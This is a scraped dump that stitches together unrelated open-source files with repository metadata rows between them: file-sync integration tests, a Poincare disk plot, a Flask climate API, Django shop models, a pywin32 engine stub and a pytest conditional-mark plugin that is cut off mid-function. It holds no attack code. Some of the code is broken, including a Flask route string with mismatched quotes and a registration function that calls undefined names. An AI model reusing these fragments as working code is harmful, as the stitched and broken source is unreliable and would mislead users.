assert_equal(local.get_content('/Folder 2/File 4.txt'), "ddd")
assert_equal(local.get_content('/Folder 2/Duplicated File.txt'),
"Some content.")
assert_equal(local.get_content('/Folder 2/Duplicated File__1.txt'),
"Other content.")
# Wait a bit for file time stamps to increase enough: on most OS the file
# modification time resolution is 1s
time.sleep(1.0)
# Let do some local and remote changes concurrently
local.delete('/File 5.txt')
local.update_content('/Folder 1/File 1.txt', 'aaaa')
remote_client.update_content('/Folder 1/Folder 1.1/File 2.txt', 'bbbb')
remote_client.delete('/Folder 2')
f3 = remote_client.make_folder(TEST_WORKSPACE, 'Folder 3')
remote_client.make_file(f3, 'File 6.txt', content='ffff')
local.make_folder('/', 'Folder 4')
# Rescan
ctl.scan_local(expected_folder, session)
ctl.scan_remote(expected_folder, session)
assert_equal(ctl.children_states(expected_folder), [
(u'/File 5.txt', u'locally_deleted'),
(u'/Folder 1', u'children_modified'),
(u'/Folder 2', u'children_modified'), # what do we want for this?
# Folder 3 is not yet visible has not sync has happen to give it a
# local path yet
(u'/Folder 4', u'unknown'),
])
# It is possible to fetch the full children states of the root though:
full_states = ctl.children_states(expected_folder, full_states=True)
assert_equal(len(full_states), 5)
assert_equal(full_states[0][0].remote_name, 'Folder 3')
assert_equal(full_states[0][1], 'children_modified')
states = ctl.children_states(expected_folder + '/Folder 1')
expected_states = [
(u'/Folder 1/File 1.txt', 'locally_modified'),
(u'/Folder 1/Folder 1.1', 'children_modified'),
(u'/Folder 1/Folder 1.2', 'synchronized'),
]
assert_equal(states, expected_states)
states = ctl.children_states(expected_folder + '/Folder 1/Folder 1.1')
expected_states = [
(u'/Folder 1/Folder 1.1/File 2.txt', u'remotely_modified'),
]
assert_equal(states, expected_states)
states = ctl.children_states(expected_folder + '/Folder 2')
expected_states = [
(u'/Folder 2/Duplicated File.txt', u'remotely_deleted'),
(u'/Folder 2/Duplicated File__1.txt', u'remotely_deleted'),
(u'/Folder 2/File 4.txt', u'remotely_deleted'),
]
assert_equal(states, expected_states)
# Perform synchronization
assert_equal(ctl.synchronize(limit=100), 10)
# We should now be fully synchronized again
assert_equal(len(ctl.list_pending()), 0)
assert_equal(ctl.children_states(expected_folder), [
(u'/Folder 1', 'synchronized'),
(u'/Folder 3', 'synchronized'),
(u'/Folder 4', 'synchronized'),
])
states = ctl.children_states(expected_folder + '/Folder 1')
expected_states = [
(u'/Folder 1/File 1.txt', 'synchronized'),
(u'/Folder 1/Folder 1.1', 'synchronized'),
(u'/Folder 1/Folder 1.2', 'synchronized'),
]
assert_equal(states, expected_states)
assert_equal(local.get_content('/Folder 1/File 1.txt'), "aaaa")
assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "bbbb")
assert_equal(local.get_content('/Folder 3/File 6.txt'), "ffff")
assert_equal(remote_client.get_content('/Folder 1/File 1.txt'),
"aaaa")
assert_equal(remote_client.get_content('/Folder 1/Folder 1.1/File 2.txt'),
"bbbb")
assert_equal(remote_client.get_content('/Folder 3/File 6.txt'),
"ffff")
# Rescan: no change to detect we should reach a fixpoint
ctl.scan_local(expected_folder, session)
ctl.scan_remote(expected_folder, session)
assert_equal(len(ctl.list_pending()), 0)
assert_equal(ctl.children_states(expected_folder), [
(u'/Folder 1', 'synchronized'),
(u'/Folder 3', 'synchronized'),
(u'/Folder 4', 'synchronized'),
])
# Send some binary data that is not valid in utf-8 or ascii (to test the
# HTTP / Multipart transform layer).
time.sleep(1.0)
local.update_content('/Folder 1/File 1.txt', "\x80")
remote_client.update_content('/Folder 1/Folder 1.1/File 2.txt', '\x80')
ctl.scan_local(expected_folder, session)
ctl.scan_remote(expected_folder, session)
assert_equal(ctl.synchronize(limit=100), 2)
assert_equal(remote_client.get_content('/Folder 1/File 1.txt'), "\x80")
assert_equal(local.get_content('/Folder 1/Folder 1.1/File 2.txt'), "\x80")
@with_integration_env
def test_synchronization_modification_on_created_file():
# Regression test: a file is created locally, then modification is detected
# before first upload
ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
assert_equal(ctl.list_pending(), [])
# Let's create some document on the client and the server
local = LocalClient(expected_folder)
local.make_folder('/', 'Folder')
local.make_file('/Folder', 'File.txt', content='Some content.')
# First local scan (assuming the network is offline):
ctl.scan_local(expected_folder)
assert_equal(len(ctl.list_pending()), 2)
assert_equal(ctl.children_states(expected_folder), [
(u'/Folder', 'children_modified'),
])
assert_equal(ctl.children_states(expected_folder + '/Folder'), [
(u'/Folder/File.txt', u'unknown'),
])
# Wait a bit for file time stamps to increase enough: on most OS the file
# modification time resolution is 1s
time.sleep(1.0)
# Let's modify it offline and rescan locally
local.update_content('/Folder/File.txt', content='Some content.')
ctl.scan_local(expected_folder)
assert_equal(len(ctl.list_pending()), 2)
assert_equal(ctl.children_states(expected_folder), [
(u'/Folder', u'children_modified'),
])
assert_equal(ctl.children_states(expected_folder + '/Folder'), [
(u'/Folder/File.txt', u'locally_modified'),
])
# Assume the computer is back online, the synchronization should occur as if
# the document was just created and not trigger an update
ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0.010,
max_loops=1, fault_tolerant=False)
assert_equal(len(ctl.list_pending()), 0)
assert_equal(ctl.children_states(expected_folder), [
(u'/Folder', u'synchronized'),
])
assert_equal(ctl.children_states(expected_folder + '/Folder'), [
(u'/Folder/File.txt', u'synchronized'),
])
@with_integration_env
def test_synchronization_loop():
ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
assert_equal(ctl.list_pending(), [])
assert_equal(ctl.synchronize(), 0)
# Let's create some document on the client and the server
local = LocalClient(expected_folder)
local.make_folder('/', 'Folder 3')
make_server_tree()
# Run the full synchronization loop a limited amount of times
ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0.010,
max_loops=3, fault_tolerant=False)
# All is synchronized
assert_equal(len(ctl.list_pending()), 0)
assert_equal(ctl.children_states(expected_folder), [
(u'/File 5.txt', u'synchronized'),
(u'/Folder 1', u'synchronized'),
(u'/Folder 2', u'synchronized'),
(u'/Folder 3', u'synchronized'),
])
@with_integration_env
def test_synchronization_offline():
ctl.bind_server(LOCAL_NXDRIVE_FOLDER, NUXEO_URL, USER, PASSWORD)
ctl.bind_root(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE)
expected_folder = os.path.join(LOCAL_NXDRIVE_FOLDER, TEST_WORKSPACE_TITLE)
assert_equal(ctl.list_pending(), [])
assert_equal(ctl.synchronize(), 0)
# Let's create some document on the client and the server
local = LocalClient(expected_folder)
local.make_folder('/', 'Folder 3')
make_server_tree()
# Find various ways to similate network or server failure
errors = [
urllib2.URLError('Test error'),
socket.error('Test error'),
httplib.HTTPException('Test error'),
]
for error in errors:
ctl.make_remote_raise(error)
# Synchronization does not occur but does not fail either
ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0,
max_loops=1, fault_tolerant=False)
# Only the local change has been detected
assert_equal(len(ctl.list_pending()), 1)
# Reenable network
ctl.make_remote_raise(None)
ctl.loop(full_local_scan=True, full_remote_scan=True, delay=0,
max_loops=1, fault_tolerant=False)
# All is synchronized
assert_equal(len(ctl.list_pending()), 0)
assert_equal(ctl.children_states(expected_folder), [
(u'/File 5.txt', u'synchronized'),
(u'/Folder 1', u'synchronized'),
(u'/Folder 2', u'synchronized'),
(u'/Folder 3', u'synchronized'),
])
| [
"olivier.grisel@ensta.org"
] | olivier.grisel@ensta.org |
b6fee919c70d1e39c2b3d355b1d28e92deee5f0f | 4538a25701f9f108278036ab520a81dcb0de15fe | /non-euclidean/poincare_disk.py | 3b4db43c4f79cbcb2967125f2771ddae7b9111fc | [
"MIT"
] | permissive | foamliu/Complex-Analysis | daef349ddf5ad8f8037fb026d4eab35d4a3192c8 | 6389c69dad680015cb7fa5fe9789793638ccddd0 | refs/heads/master | 2020-05-09T21:00:24.454517 | 2019-05-28T09:37:17 | 2019-05-28T09:37:17 | 181,427,148 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | import matplotlib.pyplot as plt
import numpy as np
u = np.linspace(-1, 1, 200)
v = np.linspace(0, 3, 360)
uu, vv = np.meshgrid(u, v)
z0 = uu + 1j * vv
z = (1j * z0 + 1) / (z0 + 1j)
T = np.arctan2(uu, vv)
plt.figure(figsize=(14, 6))
plt.subplot(1, 2, 1)
plt.scatter(uu, vv, c=T, s=10, lw=0, cmap='hsv')
plt.title('real points')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)
plt.subplot(1, 2, 2)
plt.scatter(np.real(z), np.imag(z), c=T, s=10, lw=0, cmap='hsv')
plt.title('poincare disk')
plt.xlabel('Re(z)')
plt.ylabel('Im(z)')
plt.axis('equal')
plt.grid(True)
plt.show()
| [
"foamliu@yeah.net"
] | foamliu@yeah.net |
fd8db4fd2ea2cced67e397b5060fe198e20fc74a | 97326c2dcdcc9ef8232d99e4445a1cc6a37aec22 | /docs/conditionals/example-6.py | bfb84e4bbe26d99c2358aba5838785b36a1e70e8 | [] | no_license | Barnsa/programming-resources | 8e1c043106089f10553eb8f303486905c7215c77 | 1ad0483a0f964f36fe65fda2d614c2782e0f1ed1 | refs/heads/master | 2022-11-17T17:06:56.736072 | 2020-07-21T13:06:52 | 2020-07-21T13:06:52 | 266,988,442 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # example-6.py
# examples of exotic literals at work
string_literals = "string"
integer_literals = 12
octal_literals = 0o11
hexadecimal_literals = 0x123
set_literals = {2, 4, 7}
complex_literals = 12J
unicode_literals = u"string"
byte_code_literals = b"string"
print(
string_literals,
integer_literals,
octal_literals,
hexadecimal_literals,
set_literals,
complex_literals,
unicode_literals,
byte_code_literals
) | [
"barnsa@uni.coventry.ac.uk"
] | barnsa@uni.coventry.ac.uk |
fcd354527ad7264d9770ddd8aa6d4c00fc4838c0 | 3fcd2c184abaa9bef5f4a916fbf0e9587da06346 | /IO/Asynchronous/Asyncio/aio_http.py | 7334a8e74fea9ff2ad791431ca5cf882865cab4a | [] | no_license | chinitacode/Python_Learning | 865ff42722e256776ae91d744b779fa476e23f45 | 49aa02367e3097aca107b70dab43b5f60a67ef9f | refs/heads/master | 2020-06-29T01:05:39.331297 | 2020-03-21T14:29:51 | 2020-03-21T14:29:51 | 200,393,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | import asyncio,aiohttp
async def fetch_async(url):
print(url)
async with aiohttp.request("GET",url) as r:
reponse = await r.text(encoding="utf-8")
#或者直接await r.read()不编码,直接读取,适合于图像等无法编码文件
print(reponse)
tasks = [fetch_async('http://www.baidu.com/'), fetch_async('http://www.chouti.com/')]
event_loop = asyncio.get_event_loop()
results = event_loop.run_until_complete(asyncio.gather(*tasks))
event_loop.close()
| [
"ziyu_zhou_victoria@163.com"
] | ziyu_zhou_victoria@163.com |
93c65dd75d66f049ff657435e9c8c72035489204 | 8a38510041fbd73e23f120c59972234f79fcfc92 | /.history/app_20200724004120.py | fc080273444efadba537baadb536e3b2a0a3e5e9 | [] | no_license | ermiasgelaye/sqlalchemy-challenge | 232fee2fa899a5d4ad4fe69f229d55d7d5d6d494 | 329560a1bf137c3ed61181c2500800fb311179f1 | refs/heads/master | 2022-11-28T20:06:15.832330 | 2020-07-25T18:43:33 | 2020-07-25T18:43:33 | 280,707,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,665 | py | import numpy as np
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
import datetime as dt
from dateutil.relativedelta import relativedelta
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///./Resources/hawaii.sqlite")
# Reflect an existing database into a new model.
Base = automap_base()
# Reflect the tables.
Base.prepare(engine, reflect=True)
# Save reference to the tables.
Measurement = Base.classes.measurement
Station = Base.classes.station
# print(Base.classes.keys())
#################################################
# Flask Setup
#################################################
app = Flask(__name__,static_url_path='/Images/surfs-up.png')
#################################################
# Flask Routes
#################################################
# Set the home page,and List all routes that are available. For easy to use I hyperlink the list
@app.route("/")
def welcome():
"""List all available api routes."""
return (
f"<h1>Welcome to the Climate App API!</h1>"
f"<h1>Step 2 - Climate App</h1>"
f"< p > Produces this image in our document: < br > <img width='200" src="http://az616578.vo.msecnd.net/files/2016/07/08/6360356198438627441310256453_dog%20college.jpg" / > < /p >"
f"This is a Flask API for Climate Analysis .<br/><br/><br/>"
f"<h2>Here are the Available Routes:</h2>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/start<br/>"
f"/api/v1.0/start/end<br/>"
f"<h2>Here you can get the hyperlinked Routes list click the link to see the pages:</h2>"
f"<ol><li><a href=http://127.0.0.1:5000/api/v1.0/precipitation>"
f"JSON list of precipitation amounts by date for the most recent year of data available</a></li><br/><br/>"
f"<li><a href=http://127.0.0.1:5000/api/v1.0/stations>"
f"JSON list of weather stations and their details</a></li><br/><br/>"
f"<li><a href=http://127.0.0.1:5000/api/v1.0/tobs>"
f"JSON list of the last 12 months of recorded temperatures</a></li><br/><br/>"
f"<li><a href=http://127.0.0.1:5000/api/v1.0/2017-08-23>"
f"When given the start date (YYYY-MM-DD), calculates the minimum, average, and maximum temperature for all dates greater than and equal to the start date</a></li><br/><br/>"
f"<li><a href=http://127.0.0.1:5000/api/v1.0/2016-08-23/2017-08-23>"
f"When given the start and the end date (YYYY-MM-DD), calculate the minimum, average, and maximum temperature for dates between the start and end date</a></li></ol><br/>"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
"""Query to retrieve the last 12 months of precipitation data and return the results."""
# Create our session (link) from Python to the DB.
session = Session(engine)
# Calculate the date 1 year ago from the last data point in the database.
last_measurement_data_point_tuple = session.query(
Measurement.date).order_by(Measurement.date.desc()).first()
(latest_date, ) = last_measurement_data_point_tuple
latest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')
latest_date = latest_date.date()
date_year_ago = latest_date - relativedelta(years=1)
# Perform a query to retrieve the data and precipitation scores.
data_from_last_year = session.query(Measurement.date, Measurement.prcp).filter(
Measurement.date >= date_year_ago).all()
session.close()
# Convert the query results to a dictionary using date as the key and prcp as the value.
all_precipication = []
for date, prcp in data_from_last_year:
if prcp != None:
precip_dict = {}
precip_dict[date] = prcp
all_precipication.append(precip_dict)
# Return the JSON representation of dictionary.
return jsonify(all_precipication)
@app.route("/api/v1.0/tobs")
def tobs():
"""Query for the dates and temperature observations from a year from the last data point for the most active station."""
# Create our session (link) from Python to the DB.
session = Session(engine)
# Calculate the date 1 year ago from the last data point in the database.
last_measurement_data_point_tuple = session.query(
Measurement.date).order_by(Measurement.date.desc()).first()
(latest_date, ) = last_measurement_data_point_tuple
latest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')
latest_date = latest_date.date()
date_year_ago = latest_date - relativedelta(years=1)
# Find the most active station.
most_active_station = session.query(Measurement.station).\
group_by(Measurement.station).\
order_by(func.count().desc()).\
first()
# Get the station id of the most active station.
(most_active_station_id, ) = most_active_station
print(
f"The station id of the most active station is {most_active_station_id}.")
# Perform a query to retrieve the data and temperature scores for the most active station from the last year.
data_from_last_year = session.query(Measurement.date, Measurement.tobs).filter(
Measurement.station == most_active_station_id).filter(Measurement.date >= date_year_ago).all()
session.close()
# Convert the query results to a dictionary using date as the key and temperature as the value.
all_temperatures = []
for date, temp in data_from_last_year:
if temp != None:
temp_dict = {}
temp_dict[date] = temp
all_temperatures.append(temp_dict)
# Return the JSON representation of dictionary.
return jsonify(all_temperatures)
@app.route("/api/v1.0/stations")
def stations():
"""Return a JSON list of stations from the dataset."""
# Create our session (link) from Python to the DB
session = Session(engine)
# Query for stations.
stations = session.query(Station.station, Station.name,
Station.latitude, Station.longitude, Station.elevation).all()
session.close()
# Convert the query results to a dictionary.
all_stations = []
for station, name, latitude, longitude, elevation in stations:
station_dict = {}
station_dict["station"] = station
station_dict["name"] = name
station_dict["latitude"] = latitude
station_dict["longitude"] = longitude
station_dict["elevation"] = elevation
all_stations.append(station_dict)
# Return the JSON representation of dictionary.
return jsonify(all_stations)
@app.route('/api/v1.0/<start>', defaults={'end': None})
@app.route("/api/v1.0/<start>/<end>")
def determine_temps_for_date_range(start, end):
"""Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range."""
"""When given the start only, calculate TMIN, TAVG, and TMAX for all dates greater than and equal to the start date."""
"""When given the start and the end date, calculate the TMIN, TAVG, and TMAX for dates between the start and end date inclusive."""
# Create our session (link) from Python to the DB.
session = Session(engine)
# If we have both a start date and an end date.
if end != None:
temperature_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start).filter(
Measurement.date <= end).all()
# If we only have a start date.
else:
temperature_data = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\
filter(Measurement.date >= start).all()
session.close()
# Convert the query results to a list.
temperature_list = []
no_temperature_data = False
for min_temp, avg_temp, max_temp in temperature_data:
if min_temp == None or avg_temp == None or max_temp == None:
no_temperature_data = True
temperature_list.append(min_temp)
temperature_list.append(avg_temp)
temperature_list.append(max_temp)
# Return the JSON representation of dictionary.
if no_temperature_data == True:
return f"No temperature data found for the given date range. Try another date range."
else:
return jsonify(temperature_list)
if __name__ == '__main__':
app.run(debug=True)
| [
"ermiasgelaye@gmail.com"
] | ermiasgelaye@gmail.com |
c841438efbd14ab47aef4d8d1813c0b63f7c73b0 | 3546dd5dbcffc8509440c820faa7cf28080c5df7 | /python35/Lib/site-packages/win32comext/axscript/client/pydumper.py | a4a3a5941321bfaad120bfa5bedbefa34bfa6bae | [
"Apache-2.0",
"MIT",
"BSD-3-Clause",
"LGPL-2.1-only"
] | permissive | Matchoc/python_env | 55ad609c8270cc6148eda22d37f36709d73b3652 | 859d84d1717a265a4085ad29706b12c19c62d36f | refs/heads/master | 2022-02-13T11:05:51.825544 | 2020-06-05T02:42:08 | 2020-06-05T02:42:08 | 75,793,921 | 0 | 1 | Apache-2.0 | 2018-12-14T07:30:28 | 2016-12-07T03:06:13 | Python | UTF-8 | Python | false | false | 2,204 | py | # pydumper.py
#
# This is being worked on - it does not yet work at all, in ay way
# shape or form :-)
#
# A new script engine, derived from the standard scripting engine,
# which dumps information.
# This generally can be used to grab all sorts of useful details about
# an engine - expose bugs in it or Python, dump the object model, etc.
# As it is derived from the standard engine, it fully supports Python
# as a scripting language - meaning the dumps produced can be quite dynamic,
# and based on the script code you execute.
from . import pyscript
from win32com.axscript import axscript
from .pyscript import RaiseAssert, trace, Exception, SCRIPTTEXT_FORCEEXECUTION
PyDump_CLSID = '{ac527e60-c693-11d0-9c25-00aa00125a98}'
class AXScriptAttribute(pyscript.AXScriptAttribute):
pass
class NamedScriptAttribute(pyscript.NamedScriptAttribute):
pass
class PyScript(pyscript.PyScript):
pass
def Register():
import sys
if '-d' in sys.argv:
dispatcher = "DispatcherWin32trace"
debug_desc = " ("+dispatcher+")"
debug_option = "Yes"
else:
dispatcher = None
debug_desc = ""
debug_option = ""
categories = [axscript.CATID_ActiveScript,axscript.CATID_ActiveScriptParse]
clsid = PyDump_CLSID
lcid = 0x0409 # // english
policy = None # "win32com.axscript.client.axspolicy.AXScriptPolicy"
print("Registering COM server%s..." % debug_desc)
from win32com.server.register import RegisterServer
languageName = "PyDump"
verProgId = "Python.Dumper.1"
RegisterServer(clsid = clsid, pythonInstString = "win32com.axscript.client.pyscript.PyDumper",
className = "Python Debugging/Dumping ActiveX Scripting Engine",
progID = languageName, verProgID = verProgId,
catids = categories,
policy=policy, dispatcher = dispatcher)
CreateRegKey(languageName + "\\OLEScript")
# Basic Registration for wsh.
win32com.server.register._set_string(".pysDump", "pysDumpFile")
win32com.server.register._set_string("pysDumpFile\\ScriptEngine", languageName)
print("Dumping Server registered.")
if __name__=='__main__':
Register()
| [
"matchoc@hotmail.com"
] | matchoc@hotmail.com |
ceda2d124f5d6c5c706163f206aa8d15a250ada9 | 4f0385a90230c0fe808e8672bb5b8abcceb43783 | /LNH/day5-teacher/7 包的使用/xxx/yyy/aaa/m1.py | 52ba2ce0ef803ea3d3ad665913b4de82ebbc6d7b | [] | no_license | lincappu/pycharmlearningproject | 4084dab7adde01db9fa82a12769a67e8b26b3382 | b501523e417b61373688ba12f11b384166baf489 | refs/heads/master | 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30 | py | def f1():
print('from f1') | [
"lincappu@163.com"
] | lincappu@163.com |
078cbf9ece2db7c8b5f1892f5fcbb5f78c300ffa | fe8fa8bf7273a7894f91f5027880164358047e85 | /shop/models.py | b673dfc67bb0d074ce0066def6e818b5590979ea | [
"MIT"
] | permissive | urosjevremovic/online-shop | 7935be8947ebaa4f44c28dae6ed0b895c89fcd0e | 39328da7438852206a355df5a4ae6c8aa90c186b | refs/heads/master | 2020-03-23T16:42:25.248301 | 2018-07-25T15:07:35 | 2018-07-25T15:07:35 | 141,823,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,363 | py | from django.db import models
from django.urls import reverse
class Category(models.Model):
name = models.CharField(max_length=120, db_index=True)
slug = models.CharField(max_length=120, unique=True)
class Meta:
ordering = ('-name', )
verbose_name = 'category'
verbose_name_plural = 'categories'
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('shop:product_list_by_category', args=[self.slug])
class Product(models.Model):
category = models.ForeignKey(Category, related_name='product', on_delete=models.CASCADE)
name = models.CharField(max_length=200, db_index=True)
slug = models.CharField(max_length=200, db_index=True)
image = models.ImageField(upload_to='product/%Y/%m/%d', blank=True)
description = models.TextField(blank=True)
price = models.DecimalField(max_digits=10, decimal_places=2)
stock = models.IntegerField(default=20)
available = models.BooleanField(default=True)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-name', )
index_together = (('id', 'slug'), )
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('shop:product_detail', args=[self.id, self.slug])
| [
"jevremovic.uros91@gmail.com"
] | jevremovic.uros91@gmail.com |
a9c0cc46a672f103bd8cb638903d9daa7764666c | 0c90211f4564d4541aade68cf93997bcf64827f1 | /tests/common/plugins/conditional_mark/__init__.py | 371617973861cdc6d31896fc5259a5c3c16839c3 | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | stephenxs/sonic-mgmt | 74a3662212a5ee5b2583a93fc17b43cdd5a2c0a0 | 85dd08e4d86884ff0031c75b99de3c67b5e24698 | refs/heads/master | 2023-08-15T17:48:52.537559 | 2023-05-19T03:10:08 | 2023-05-19T03:10:08 | 188,744,518 | 0 | 0 | NOASSERTION | 2021-09-17T03:06:51 | 2019-05-27T00:15:18 | Python | UTF-8 | Python | false | false | 23,816 | py | """Plugin for adding any mark to specified test cases based on conditions in a centralized file.
This plugin supports adding any mark to specified test cases based on conditions. All the information of test cases,
marks, and conditions can be specified in a centralized file.
"""
import json
import logging
import os
import re
import subprocess
import yaml
import glob
import pytest
from tests.common.testbed import TestbedInfo
from .issue import check_issues
logger = logging.getLogger(__name__)
DEFAULT_CONDITIONS_FILE = 'common/plugins/conditional_mark/tests_mark_conditions*.yaml'
ASIC_NAME_PATH = '/../../../../ansible/group_vars/sonic/variables'
def pytest_addoption(parser):
"""Add options for the conditional mark plugin.
"""
parser.addoption(
'--mark-conditions-files',
action='append',
dest='mark_conditions_files',
default=[],
help="Location of your own mark conditions file. If it is not specified, the default file will be used.")
parser.addoption(
'--ignore-conditional-mark',
action='store_true',
dest='ignore_conditional_mark',
default=False,
help="Ignore the conditional mark plugin. No conditional mark will be added.")
parser.addoption(
'--customize_inventory_file',
action='store',
dest='customize_inventory_file',
default=False,
help="Location of your custom inventory file. "
"If it is not specified, and inv_name not in testbed.csv, 'lab' will be used")
parser.addoption(
'--dynamic_update_skip_reason',
action='store_true',
dest='dynamic_update_skip_reason',
default=False,
help="Dynamically update the skip reason based on the conditions, "
"by default it will not use the static reason specified in the mark conditions file")
def load_conditions(session):
"""Load the content from mark conditions file
Args:
session (obj): The pytest session object.
Returns:
dict or None: Return the mark conditions dict or None if there something went wrong.
"""
conditions_list = list()
conditions_files = session.config.option.mark_conditions_files
for condition in conditions_files:
if '*' in condition:
conditions_files.remove(condition)
files = glob.glob(condition)
for file in files:
if file not in conditions_files:
conditions_files.append(file)
if not conditions_files:
conditions_files = glob.glob(DEFAULT_CONDITIONS_FILE)
conditions_files = [f for f in conditions_files if os.path.exists(f)]
if not conditions_files:
pytest.fail('There is no conditions files')
try:
logger.debug('Trying to load test mark conditions files: {}'.format(conditions_files))
for conditions_file in conditions_files:
with open(conditions_file) as f:
logger.debug('Loaded test mark conditions file: {}'.format(conditions_file))
conditions = yaml.safe_load(f)
for key, value in list(conditions.items()):
conditions_list.append({key: value})
except Exception as e:
logger.error('Failed to load {}, exception: {}'.format(conditions_files, repr(e)), exc_info=True)
pytest.fail('Loading conditions file "{}" failed. Possibly invalid yaml file.'.format(conditions_files))
return conditions_list
def read_asic_name(hwsku):
'''
Get asic generation name from file 'ansible/group_vars/sonic/variables'
Args:
hwsku (str): Dut hwsku name
Returns:
str or None: Return the asic generation name or None if something went wrong or nothing found in the file.
'''
asic_name_file = os.path.dirname(__file__) + ASIC_NAME_PATH
try:
with open(asic_name_file) as f:
asic_name = yaml.safe_load(f)
for key, value in list(asic_name.copy().items()):
if ('td' not in key) and ('th' not in key) and ('spc' not in key):
asic_name.pop(key)
for name, hw in list(asic_name.items()):
if hwsku in hw:
return name.split('_')[1]
return "unknown"
except IOError:
return None
def load_dut_basic_facts(inv_name, dut_name):
"""Run 'ansible -m dut_basic_facts' command to get some basic DUT facts.
The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.
Args:
inv_name (str): The name of inventory.
dut_name (str): The name of dut.
Returns:
dict or None: Return the dut basic facts dict or None if something went wrong.
"""
results = {}
logger.info('Getting dut basic facts')
try:
inv_full_path = os.path.join(os.path.dirname(__file__), '../../../../ansible', inv_name)
ansible_cmd = 'ansible -m dut_basic_facts -i {} {} -o'.format(inv_full_path, dut_name)
raw_output = subprocess.check_output(ansible_cmd.split()).decode('utf-8')
logger.debug('raw dut basic facts:\n{}'.format(raw_output))
output_fields = raw_output.split('SUCCESS =>', 1)
if len(output_fields) >= 2:
results.update(json.loads(output_fields[1].strip())['ansible_facts']['dut_basic_facts'])
results['asic_gen'] = read_asic_name(results['hwsku'])
except Exception as e:
logger.error('Failed to load dut basic facts, exception: {}'.format(repr(e)))
return results
def get_basic_facts(session):
testbed_name = session.config.option.testbed
testbed_name_cached = session.config.cache.get('TB_NAME', None)
basic_facts_cached = session.config.cache.get('BASIC_FACTS', None)
if testbed_name_cached != testbed_name:
# clear chche
session.config.cache.set('TB_NAME', None)
session.config.cache.set('BASIC_FACTS', None)
# get basic facts
basic_facts = load_basic_facts(session)
# update cache
session.config.cache.set('TB_NAME', testbed_name)
session.config.cache.set('BASIC_FACTS', basic_facts)
else:
if not basic_facts_cached:
basic_facts = load_basic_facts(session)
session.config.cache.set('BASIC_FACTS', basic_facts)
def load_minigraph_facts(inv_name, dut_name):
"""Run 'ansible -m minigraph_facts -a host={{hostname}}' command to get some basic minigraph facts.
The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.
Args:
inv_name (str): The name of inventory.
dut_name (str): The name of dut.
Returns:
dict or None: Return the minigraph basic facts dict or None if something went wrong.
"""
results = {}
logger.info('Getting minigraph basic facts')
try:
# get minigraph basic faces
ansible_cmd = "ansible -m minigraph_facts -i ../ansible/{0} {1} -a host={1}".format(inv_name, dut_name)
raw_output = subprocess.check_output(ansible_cmd.split()).decode('utf-8')
logger.debug('raw minigraph basic facts:\n{}'.format(raw_output))
output_fields = raw_output.split('SUCCESS =>', 1)
if len(output_fields) >= 2:
output_fields = json.loads(output_fields[1].strip())['ansible_facts']
results['minigraph_interfaces'] = output_fields['minigraph_interfaces']
results['minigraph_portchannels'] = output_fields['minigraph_portchannels']
results['minigraph_portchannel_interfaces'] = output_fields['minigraph_portchannel_interfaces']
results['minigraph_neighbors'] = output_fields['minigraph_neighbors']
except Exception as e:
logger.error('Failed to load minigraph basic facts, exception: {}'.format(repr(e)))
return results
def load_config_facts(inv_name, dut_name):
"""Run 'ansible -m config_facts -a 'host={{hostname}} source='persistent' ' command to get some basic config facts.
The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.
Args:
inv_name (str): The name of inventory.
dut_name (str): The name of dut.
Returns:
dict or None: Return the minigraph basic facts dict or None if something went wrong.
"""
results = {}
logger.info('Getting config basic facts')
try:
# get config basic faces
ansible_cmd = ['ansible', '-m', 'config_facts', '-i', '../ansible/{}'.format(inv_name),
'{}'.format(dut_name), '-a', 'host={} source=\'persistent\''.format(dut_name)]
raw_output = subprocess.check_output(ansible_cmd).decode('utf-8')
logger.debug('raw config basic facts:\n{}'.format(raw_output))
output_fields = raw_output.split('SUCCESS =>', 1)
if len(output_fields) >= 2:
output_fields = json.loads(output_fields[1].strip())['ansible_facts']
results['VOQ_INBAND_INTERFACE'] = output_fields.get('VOQ_INBAND_INTERFACE', {})
